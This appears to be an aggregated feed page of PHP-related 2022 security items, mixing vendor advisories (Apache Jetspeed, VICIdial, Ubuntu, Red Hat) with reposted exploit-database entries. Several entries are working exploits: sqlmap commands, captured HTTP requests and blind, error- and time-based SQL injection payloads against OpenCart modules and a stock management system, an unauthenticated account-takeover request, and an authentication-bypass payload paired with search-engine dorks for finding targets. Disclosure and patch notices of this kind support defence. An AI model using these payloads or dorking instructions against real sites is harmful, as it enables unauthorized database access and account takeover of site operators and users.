** UNSUPPORTED WHEN ASSIGNED ** Apache Jetspeed-2 does not sufficiently filter untrusted user input by default leading to a number of issues including XSS, CSRF, XXE, and SSRF. Setting the configuration option "xss.filter.post = true" may mitigate these issues. NOTE: Apache Jetspeed is a dormant project of Apache Portals and no updates will be provided for this issue.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[day\] \[month\] \[year\] \[list\]

Date: Wed, 06 Jul 2022 09:35:31 +0000
From: "Mark J. Cox" <mjc@...che.org>
To: oss-security@...ts.openwall.com
Subject: CVE-2022-32533: Apache Portals Jetspeed XSS, CSRF, SSRF, and XXE
 issues 

Severity: moderate

Description:

\*\* UNSUPPORTED WHEN ASSIGNED \*\* Apache Jetspeed-2 does not sufficiently filter untrusted user input by default leading to a number of issues including XSS, CSRF, XXE, and SSRF.  Setting the configuration option "xss.filter.post = true" may mitigate these issues.

NOTE: Apache Jetspeed is a dormant project of Apache Portals and no updates will be provided for this issue.  

Credit:

Thanks to RunningSnail for reporting.

References:

https://lists.apache.org/thread/d3g248pr03x8rvmh8p2t3xdlw0wn5dz2

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2022-32533: security - CVE-2022-32533: Apache Portals Jetspeed XSS, CSRF, SSRF, and XXE issues

So Filter Shop v3.x was discovered to contain multiple blind SQL injection vulnerabilities via the att_value_id , manu_value_id , opt_value_id , and subcate_value_id parameters at /index.php?route=extension/module/so_filter_shop_by/filter_data.

    # Exploit Title: OpenCart v3.x So Filter Shop By - Blind SQL Injection# Date: 28/06/2022# Exploit Author: Saud Alenazi# Vendor Homepage: https://www.opencart.com/# Software Link: https://codecanyon.net/item/so-filter-shop-by-responsive-opencart-module/13945633# Version: V3.X# Tested on: XAMPP, Linux# Contact: https://twitter.com/dmaral3noz* Description :So Filter Shop By Module is compatible with any Opencart allows SQL Injection via parameter 'att_value_id , manu_value_id , opt_value_id , subcate_value_id ' in /index.php?route=extension/module/so_filter_shop_by/filter_data. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.* Sqlmap command :sqlmap -u 'http://127.0.0.1/index.php?route=extension/module/so_filter_shop_by/filter_data' --data "att_value_id=saud&category_id_path=80&condition_search=AND&isFilterShopBy=1&manu_value_id=&maxPrice=1&minPrice=0&opt_value_id=&product_arr_all=70%2C72%2C75%2C74%2C73%2C71&product_id_in=70%2C72%2C75%2C74%2C73%2C71&subcate_value_id=&text_search=saud" -p "att_value_id" --method POST --level=5 --risk=3 --dbs --random-agentRequest :===========POST /index.php?route=extension/module/so_filter_shop_by/filter_data HTTP/1.1Content-Type: application/x-www-form-urlencodedCookie: OCSESSID=aaf920777d0aacdee96eb7eb50Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip,deflateContent-Length: 29Host: 127.0.0.1User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0Connection: Keep-aliveatt_value_id=1&category_id_path=80&condition_search=AND&isFilterShopBy=1&manu_value_id=&maxPrice=1&minPrice=0&opt_value_id=&product_arr_all=70%2C72%2C75%2C74%2C73%2C71&product_id_in=70%2C72%2C75%2C74%2C73%2C71&subcate_value_id=&text_search=saud===========Output :Parameter: att_value_id (POST)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause    Payload: att_value_id=-7402) OR 6808=6808 AND (4992=4992&category_id_path=80&condition_search=AND&isFilterShopBy=1&manu_value_id=&maxPrice=1&minPrice=0&opt_value_id=&product_arr_all=70,72,75,74,73,71&product_id_in=70,72,75,74,73,71&subcate_value_id=&text_search=saud    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: att_value_id=1) AND (SELECT 6365 FROM (SELECT(SLEEP(5)))qqBP) AND (7704=7704&category_id_path=80&condition_search=AND&isFilterShopBy=1&manu_value_id=&maxPrice=1&minPrice=0&opt_value_id=&product_arr_all=70,72,75,74,73,71&product_id_in=70,72,75,74,73,71&subcate_value_id=&text_search=saud

CVE-2022-34972: OpenCart 3.x So Filter Shop By SQL Injection ≈ Packet Storm

Ingredient Stock Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /isms/admin/stocks/view_stock.php.

    # Exploit Title: Ingredient Stock Management System v1.0 - 'id' Blind SQL Injection# Date: 28/05/2022# Exploit Author: Saud Alenazi# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/15364/ingredients-stock-management-system-phpoop-free-source-code.html# Version: 1.0# Tested on: XAMPP, LinuxDescription :----------------------Ingredient Stock Management System 1.0 allows SQL Injection via parameter 'id' in/isms/admin/stocks/view_stock.php. Exploiting this issue could allow an attacker to compromisethe application, access or modify data, or exploit latent vulnerabilitiesin the underlying database# Vulnerable Code :line 74 in file "/isms/admin/stocks/view_stock.php"$stockins = $conn->query("SELECT * FROM `stockin_list` where item_id = '{$id}' order by date(`date`) asc");# Sqlmap command:sqlmap -u 'http://localhost/isms/admin/?page=stocks/view_stock&id=1' -p id --level=5 --risk=3 --dbs --random-agent --eta# Output:Parameter: id (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: page=stocks/view_stock&id=1' AND 1902=1902 AND 'yluX'='yluX    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: page=stocks/view_stock&id=1' AND (SELECT 6709 FROM (SELECT(SLEEP(5)))gZCj) AND 'vMqP'='vMqP

CVE-2022-32311: Ingredient Stock Management System 1.0 SQL Injection ≈ Packet Storm

An access control issue in Ingredient Stock Management System v1.0 allows attackers to take over user accounts via a crafted POST request to /isms/classes/Users.php.

    # Exploit Title: Ingredient Stock Management System v1.0 - Account Takeover (Unauthenticated)# Date: 28/05/2022# Exploit Author: Saud Alenazi# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/15364/ingredients-stock-management-system-phpoop-free-source-code.html# Version: 1.0# Tested on: XAMPP, LinuxDescription :----------------------Ingredient Stock Management System v1.0 is vulnerable to unauthenticated account takeover.An attacker can takeover any registered 'Staff' user account by just sending below POST requestBy changing the the "id", "firstname", "lastname" , "username" , "password" ,"type" parameters# HTTPS Request :POST /isms/classes/Users.php?f=save HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestContent-Type: multipart/form-data; boundary=---------------------------89160456138077069512415726555Content-Length: 1023Origin: http://localhostConnection: closeReferer: http://localhost/isms/admin/?page=user/manage_userCookie: PHPSESSID=mia3uiom2s9bdtif290t6v1el2-----------------------------89160456138077069512415726555Content-Disposition: form-data; name="id"1-----------------------------89160456138077069512415726555Content-Disposition: form-data; name="firstname"test-----------------------------89160456138077069512415726555Content-Disposition: form-data; name="middlename"-----------------------------89160456138077069512415726555Content-Disposition: form-data; name="lastname"hi-----------------------------89160456138077069512415726555Content-Disposition: form-data; name="username"test-----------------------------89160456138077069512415726555Content-Disposition: form-data; name="password"test-----------------------------89160456138077069512415726555Content-Disposition: form-data; name="type"1-----------------------------89160456138077069512415726555Content-Disposition: form-data; name="img"; filename=""Content-Type: application/octet-stream-----------------------------89160456138077069512415726555--====URL Login : http://localhost/isms/admin/login.php

CVE-2022-32310: Ingredient Stock Management System 1.0 Account Takeover ≈ Packet Storm

Newsletter Module v3.x was discovered to contain a SQL injection vulnerability via the zemez_newsletter_email parameter at /index.php.

    # Exploit Title: OpenCart v3.x Newsletter Module - Blind SQLi
    # Date: 19/05/2022
    # Exploit Author: Saud Alenazi
    # Vendor Homepage: https://www.opencart.com/
    # Software Link: https://www.opencart.com/index.php?route=marketplace/extension/info&extension_id=32750&filter_member=Zemez
    # Version: v.3.0.2.0
    # Tested on: XAMPP, Linux
    # Contact: https://twitter.com/dmaral3noz
    
    
    * Description :
    
    Newsletter Module is compatible with any Opencart allows SQL Injection via parameter 'zemez_newsletter_email' in /index.php?route=extension/module/zemez_newsletter/addNewsletter. 
    Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
    
    
    * Steps to Reproduce :
    - Go to : http://127.0.0.1/index.php?route=extension/module/zemez_newsletter/addNewsletter
    - Save request in BurpSuite
    - Run saved request with : sqlmap -r sql.txt -p zemez_newsletter_email --random-agent --level=5 --risk=3 --time-sec=5 --hex --dbs
    
    
    
    Request :
    
    ===========
    
    POST /index.php?route=extension/module/zemez_newsletter/addNewsletter HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Cookie: OCSESSID=aaf920777d0aacdee96eb7eb50
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Encoding: gzip,deflate
    Content-Length: 29
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
    Connection: Keep-alive
    
    zemez_newsletter_email=saud
    
    
    ===========
    
    Output :
    
    Parameter: zemez_newsletter_email (POST)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
        Payload: zemez_newsletter_email=saud%' AND 4728=(SELECT (CASE WHEN (4728=4728) THEN 4728 ELSE (SELECT 4929 UNION SELECT 7220) END))-- -
    
        Type: error-based
        Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: zemez_newsletter_email=saud%' OR (SELECT 4303 FROM(SELECT COUNT(*),CONCAT(0x716a6b7171,(SELECT (ELT(4303=4303,1))),0x7162787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'xlVz%'='xlVz
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: zemez_newsletter_email=saud%' AND (SELECT 5968 FROM (SELECT(SLEEP(5)))yYJX) AND 'yJkK%'='yJkK

CVE-2022-31856: Offensive Security’s Exploit Database Archive

Reflected Cross Site Scripting (XSS) vulnerabilities in AST Agent Time Sheet interface (/vicidial/AST_agent_time_sheet.php) of VICIdial via agent, and search_archived_data parameters. This issue affects: VICIdial 2.14b0.5 versions prior to 3555.

Please read this carefully as it contains important information regarding the security of your VICIdial system.

Due to the recent discovery of several new security risks in the admin and agent web interface code, we have rolled out an update to the VICIdial code-base. These vulnerabilities have been patched and we have added additional code that further secures the web-facing portions of VICIdial. Any system that is at SVN revision 3583 or greater already has these changes(March 7, 2022). If your system is below that version, we strongly recommend that you upgrade VICIdial to address these concerns.

Instructions for how to connect to our public SVN server to get the latest code are available here:

http://wiki.vicidial.org/doku.php?id=svn

You can also find recent snapshots of the svn code available here:

https://www.vicidial.org/svn\_trunk\_nightly/

If you have a VICIhost account with us, know that we have already upgraded all servers and there is nothing that needs to be done on your end.

This Upgrade Notice covers several separate CVEs that have been submitted by several different people and organizations over the last few months, and those CVEs will be published in the near future by the people and organizations that reported them. All of these vulnerabilities involve PHP specifically, most of them require authenticated user access to your VICIdial system to exploit. Most of these exploits involved incomplete PHP input variable filtering. As a result of these reports, we spent several weeks reviewing every PHP script in the VICIdial codebase for input variables and filtering. We also made some security changes to make the system more secure by default.

If you have any questions about this notice, please contact us or reply to this post.

CVE-2022-34879: vicidial.org • View topic - Recommended VICIdial Security Upgrade Notice: April 2022

Ubuntu Security Notice 5479-2 - USN-5479-1 fixed vulnerabilities in PHP. This update provides the corresponding updates for Ubuntu 16.04 ESM. Charles Fol discovered that PHP incorrectly handled initializing certain arrays when handling the pg_query_params function. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code. Charles Fol discovered that PHP incorrectly handled passwords in mysqlnd. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-5479-2July 04, 2022php7.0 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 16.04 ESMSummary:Several security issues were fixed in PHP.Software Description:- php7.0: HTML-embedded scripting language interpreterDetails:USN-5479-1 fixed vulnerabilities in PHP. This update provides thecorresponding updates for Ubuntu 16.04 ESM.Original advisory details:  Charles Fol discovered that PHP incorrectly handled initializing certain  arrays when handling the pg_query_params function. A remote attacker could  use this issue to cause PHP to crash, resulting in a denial of service, or  possibly execute arbitrary code. (CVE-2022-31625)   Charles Fol discovered that PHP incorrectly handled passwords in mysqlnd. A  remote attacker could use this issue to cause PHP to crash, resulting in a  denial of service, or possibly execute arbitrary code. (CVE-2022-31626)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 16.04 ESM:   libapache2-mod-php7.0           7.0.33-0ubuntu0.16.04.16+esm4   php7.0-cgi                      7.0.33-0ubuntu0.16.04.16+esm4   php7.0-cli                      7.0.33-0ubuntu0.16.04.16+esm4   php7.0-fpm                      7.0.33-0ubuntu0.16.04.16+esm4   php7.0-mysql                    7.0.33-0ubuntu0.16.04.16+esm4   php7.0-pgsql                    7.0.33-0ubuntu0.16.04.16+esm4In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-5479-2   https://ubuntu.com/security/notices/USN-5479-1   CVE-2022-31625, CVE-2022-31626

Ubuntu Security Notice USN-5479-2

Advanced Testimonials Manager version 5.6 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : Advanced Testimonials Manager v5.6 Auth by pass Vulnerability                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             | | # Vendor    : https://codecanyon.net/item/advanced-testimonials-manager/113257?s_rank=194                                        |  | # Dork      : Advanced Testimonial Manager                                                                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : user & pass = ' or 1=1 limit 1 -- -+[+] http://127.0.0.1/testimonials/admin/index.php==Greetings to :=========================================================================================================================|                                                                                                                                       || jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* thelastvvv *Zigoo.eg * moncet              ||                                                                                                                                       |=========================================================================================================================================

Advanced Testimonials Manager 5.6 SQL Injection

Red Hat Security Advisory 2022-5491-01 - PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server. Issues addressed include buffer overflow and privilege escalation vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: rh-php73-php security and bug fix update  
Advisory ID:       RHSA-2022:5491-01  
Product:           Red Hat Software Collections  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:5491  
Issue date:        2022-07-04  
CVE Names:         CVE-2021-21703 CVE-2021-21707 CVE-2022-31625  
                   CVE-2022-31626  
====================================================================  
1. Summary:

An update for rh-php73-php is now available for Red Hat Software  
Collections.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7) - ppc64le, s390x, x86_64  
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7) - x86_64

3. Description:

PHP is an HTML-embedded scripting language commonly used with the Apache  
HTTP Server.

Security Fix(es):

* php: password of excessive length triggers buffer overflow leading to RCE  
(CVE-2022-31626)

* php: Local privilege escalation via PHP-FPM (CVE-2021-21703)

* php: special character breaks path in xml parsing (CVE-2021-21707)

* php: uninitialized array in pg_query_params() leading to RCE  
(CVE-2022-31625)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* rh-php73: rebase to 7.3.33 (BZ#2100753)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the updated packages, the httpd daemon must be restarted  
for the update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2016535 - CVE-2021-21703 php: Local privilege escalation via PHP-FPM  
2026045 - CVE-2021-21707 php: special character breaks path in xml parsing  
2098521 - CVE-2022-31625 php: uninitialized array in pg_query_params() leading to RCE  
2098523 - CVE-2022-31626 php: password of excessive length triggers buffer overflow leading to RCE  
2100753 - rh-php73: rebase to 7.3.33 [rhscl-3.8.z]

6. Package List:

Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7):

Source:  
rh-php73-php-7.3.33-1.el7.src.rpm

ppc64le:  
rh-php73-php-7.3.33-1.el7.ppc64le.rpm  
rh-php73-php-bcmath-7.3.33-1.el7.ppc64le.rpm  
rh-php73-php-cli-7.3.33-1.el7.ppc64le.rpm  
rh-php73-php-common-7.3.33-1.el7.ppc64le.rpm  
rh-php73-php-dba-7.3.33-1.el7.ppc64le.rpm  
rh-php73-php-dbg-7.3.33-1.el7.ppc64le.rpm  
rh-php73-php-debuginfo-7.3.33-1.el7.ppc64le.rpm  
rh-php73-php-devel-7.3.33-1.el7.ppc64le.rpm  
rh-php73-php-embedded-7.3.33-1.el7.ppc64le.rpm  
rh-php73-php-enchant-7.3.33-1.el7.ppc64le.rpm  
rh-php73-php-fpm-7.3.33-1.el7.ppc64le.rpm  
rh-php73-php-gd-7.3.33-1.el7.ppc64le.rpm  
rh-php73-php-gmp-7.3.33-1.el7.ppc64le.rpm  
rh-php73-php-intl-7.3.33-1.el7.ppc64le.rpm  
rh-php73-php-json-7.3.33-1.el7.ppc64le.rpm  
rh-php73-php-ldap-7.3.33-1.el7.ppc64le.rpm  
rh-php73-php-mbstring-7.3.33-1.el7.ppc64le.rpm  
rh-php73-php-mysqlnd-7.3.33-1.el7.ppc64le.rpm  
rh-php73-php-odbc-7.3.33-1.el7.ppc64le.rpm  
rh-php73-php-opcache-7.3.33-1.el7.ppc64le.rpm  
rh-php73-php-pdo-7.3.33-1.el7.ppc64le.rpm  
rh-php73-php-pgsql-7.3.33-1.el7.ppc64le.rpm  
rh-php73-php-process-7.3.33-1.el7.ppc64le.rpm  
rh-php73-php-pspell-7.3.33-1.el7.ppc64le.rpm  
rh-php73-php-recode-7.3.33-1.el7.ppc64le.rpm  
rh-php73-php-snmp-7.3.33-1.el7.ppc64le.rpm  
rh-php73-php-soap-7.3.33-1.el7.ppc64le.rpm  
rh-php73-php-xml-7.3.33-1.el7.ppc64le.rpm  
rh-php73-php-xmlrpc-7.3.33-1.el7.ppc64le.rpm  
rh-php73-php-zip-7.3.33-1.el7.ppc64le.rpm

s390x:  
rh-php73-php-7.3.33-1.el7.s390x.rpm  
rh-php73-php-bcmath-7.3.33-1.el7.s390x.rpm  
rh-php73-php-cli-7.3.33-1.el7.s390x.rpm  
rh-php73-php-common-7.3.33-1.el7.s390x.rpm  
rh-php73-php-dba-7.3.33-1.el7.s390x.rpm  
rh-php73-php-dbg-7.3.33-1.el7.s390x.rpm  
rh-php73-php-debuginfo-7.3.33-1.el7.s390x.rpm  
rh-php73-php-devel-7.3.33-1.el7.s390x.rpm  
rh-php73-php-embedded-7.3.33-1.el7.s390x.rpm  
rh-php73-php-enchant-7.3.33-1.el7.s390x.rpm  
rh-php73-php-fpm-7.3.33-1.el7.s390x.rpm  
rh-php73-php-gd-7.3.33-1.el7.s390x.rpm  
rh-php73-php-gmp-7.3.33-1.el7.s390x.rpm  
rh-php73-php-intl-7.3.33-1.el7.s390x.rpm  
rh-php73-php-json-7.3.33-1.el7.s390x.rpm  
rh-php73-php-ldap-7.3.33-1.el7.s390x.rpm  
rh-php73-php-mbstring-7.3.33-1.el7.s390x.rpm  
rh-php73-php-mysqlnd-7.3.33-1.el7.s390x.rpm  
rh-php73-php-odbc-7.3.33-1.el7.s390x.rpm  
rh-php73-php-opcache-7.3.33-1.el7.s390x.rpm  
rh-php73-php-pdo-7.3.33-1.el7.s390x.rpm  
rh-php73-php-pgsql-7.3.33-1.el7.s390x.rpm  
rh-php73-php-process-7.3.33-1.el7.s390x.rpm  
rh-php73-php-pspell-7.3.33-1.el7.s390x.rpm  
rh-php73-php-recode-7.3.33-1.el7.s390x.rpm  
rh-php73-php-snmp-7.3.33-1.el7.s390x.rpm  
rh-php73-php-soap-7.3.33-1.el7.s390x.rpm  
rh-php73-php-xml-7.3.33-1.el7.s390x.rpm  
rh-php73-php-xmlrpc-7.3.33-1.el7.s390x.rpm  
rh-php73-php-zip-7.3.33-1.el7.s390x.rpm

x86_64:  
rh-php73-php-7.3.33-1.el7.x86_64.rpm  
rh-php73-php-bcmath-7.3.33-1.el7.x86_64.rpm  
rh-php73-php-cli-7.3.33-1.el7.x86_64.rpm  
rh-php73-php-common-7.3.33-1.el7.x86_64.rpm  
rh-php73-php-dba-7.3.33-1.el7.x86_64.rpm  
rh-php73-php-dbg-7.3.33-1.el7.x86_64.rpm  
rh-php73-php-debuginfo-7.3.33-1.el7.x86_64.rpm  
rh-php73-php-devel-7.3.33-1.el7.x86_64.rpm  
rh-php73-php-embedded-7.3.33-1.el7.x86_64.rpm  
rh-php73-php-enchant-7.3.33-1.el7.x86_64.rpm  
rh-php73-php-fpm-7.3.33-1.el7.x86_64.rpm  
rh-php73-php-gd-7.3.33-1.el7.x86_64.rpm  
rh-php73-php-gmp-7.3.33-1.el7.x86_64.rpm  
rh-php73-php-intl-7.3.33-1.el7.x86_64.rpm  
rh-php73-php-json-7.3.33-1.el7.x86_64.rpm  
rh-php73-php-ldap-7.3.33-1.el7.x86_64.rpm  
rh-php73-php-mbstring-7.3.33-1.el7.x86_64.rpm  
rh-php73-php-mysqlnd-7.3.33-1.el7.x86_64.rpm  
rh-php73-php-odbc-7.3.33-1.el7.x86_64.rpm  
rh-php73-php-opcache-7.3.33-1.el7.x86_64.rpm  
rh-php73-php-pdo-7.3.33-1.el7.x86_64.rpm  
rh-php73-php-pgsql-7.3.33-1.el7.x86_64.rpm  
rh-php73-php-process-7.3.33-1.el7.x86_64.rpm  
rh-php73-php-pspell-7.3.33-1.el7.x86_64.rpm  
rh-php73-php-recode-7.3.33-1.el7.x86_64.rpm  
rh-php73-php-snmp-7.3.33-1.el7.x86_64.rpm  
rh-php73-php-soap-7.3.33-1.el7.x86_64.rpm  
rh-php73-php-xml-7.3.33-1.el7.x86_64.rpm  
rh-php73-php-xmlrpc-7.3.33-1.el7.x86_64.rpm  
rh-php73-php-zip-7.3.33-1.el7.x86_64.rpm

Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7):

Source:  
rh-php73-php-7.3.33-1.el7.src.rpm

x86_64:  
rh-php73-php-7.3.33-1.el7.x86_64.rpm  
rh-php73-php-bcmath-7.3.33-1.el7.x86_64.rpm  
rh-php73-php-cli-7.3.33-1.el7.x86_64.rpm  
rh-php73-php-common-7.3.33-1.el7.x86_64.rpm  
rh-php73-php-dba-7.3.33-1.el7.x86_64.rpm  
rh-php73-php-dbg-7.3.33-1.el7.x86_64.rpm  
rh-php73-php-debuginfo-7.3.33-1.el7.x86_64.rpm  
rh-php73-php-devel-7.3.33-1.el7.x86_64.rpm  
rh-php73-php-embedded-7.3.33-1.el7.x86_64.rpm  
rh-php73-php-enchant-7.3.33-1.el7.x86_64.rpm  
rh-php73-php-fpm-7.3.33-1.el7.x86_64.rpm  
rh-php73-php-gd-7.3.33-1.el7.x86_64.rpm  
rh-php73-php-gmp-7.3.33-1.el7.x86_64.rpm  
rh-php73-php-intl-7.3.33-1.el7.x86_64.rpm  
rh-php73-php-json-7.3.33-1.el7.x86_64.rpm  
rh-php73-php-ldap-7.3.33-1.el7.x86_64.rpm  
rh-php73-php-mbstring-7.3.33-1.el7.x86_64.rpm  
rh-php73-php-mysqlnd-7.3.33-1.el7.x86_64.rpm  
rh-php73-php-odbc-7.3.33-1.el7.x86_64.rpm  
rh-php73-php-opcache-7.3.33-1.el7.x86_64.rpm  
rh-php73-php-pdo-7.3.33-1.el7.x86_64.rpm  
rh-php73-php-pgsql-7.3.33-1.el7.x86_64.rpm  
rh-php73-php-process-7.3.33-1.el7.x86_64.rpm  
rh-php73-php-pspell-7.3.33-1.el7.x86_64.rpm  
rh-php73-php-recode-7.3.33-1.el7.x86_64.rpm  
rh-php73-php-snmp-7.3.33-1.el7.x86_64.rpm  
rh-php73-php-soap-7.3.33-1.el7.x86_64.rpm  
rh-php73-php-xml-7.3.33-1.el7.x86_64.rpm  
rh-php73-php-xmlrpc-7.3.33-1.el7.x86_64.rpm  
rh-php73-php-zip-7.3.33-1.el7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2021-21703  
https://access.redhat.com/security/cve/CVE-2021-21707  
https://access.redhat.com/security/cve/CVE-2022-31625  
https://access.redhat.com/security/cve/CVE-2022-31626  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYsLehtzjgjWX9erEAQiwyQ/+PV7nIzWZKjc+4JLfk/tF6u19j7lmxgo/  
rXR/9UyeBFTas8Nd+19Q2xgJdEDheHED74zskj6lsMW8V8v7DEwP3QfbBrmsWAKl  
HMahWfYEh6ZhpNMAxR1bc+z243unsHXb94b2Ed7oTNFewRxdkga1K+uhhvewfYaw  
+yycxRapynaD0SUqtP6KDFirpX14iobazHynhVbiE1KMAv9pIkYlCLJmktnR18Pp  
8UFEyGO05tovQqe38+9oVAFxnfq7f/NTmrIJAOuYcS5Lu0B9g4yMrWWiL4XjmL3U  
YWHhPm5dSRWXaKGF2JtCsQ7kShFcHj7pXnBQsoRT3GYimuYuZnR9fd3p6i1EUU6c  
6oE8Uu5D2dH1iEdYtewohgTGYkUz/IBT+f0d9Z6k0aQdroOGgczjBm8nc7pV580G  
3ksyFzk58rOyPDlslrF0OtN2Xdq3Vn2InS/EJeT6d1v0OMMn8Voezg7jE28jT/qx  
5tDKv98T4qD+IiurXBr/PFEFkZxMzKFOo6MVtkIpLuJjPf2Guy/8vO6KjUiR0ANE  
GLtzbThZrV6js/vurZr0oc7h+UdgcgVm69XlcUVi7rHij7WC0UOlbF0pYM+b805c  
HU8AYV8+9FxSB88w49p2eg1iIn0CNfKi2YQL2Gyr4T9L09Eiuf/y/HrgwLg66t4X  
4AC7K4v+QQw=KI2M  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-5491-01

DouPHP version 1.2 Release 20141027 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : DouPHP v1.2 Release 20141027 SQL Injection Vulnerability                                                           || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0(32-bit)                                              | | # Vendor    : https://www.douphp.com/                                                                                            |  | # Dork      : "Powered by DouPHP"                                                                                                |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] http://127.0.0.1/products_in.php?id=33 <====| inject here[+] http://127.0.0.1/admin/ <====| LoginGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |                                                                                                                                              |=======================================================================================================================================

Tag

#php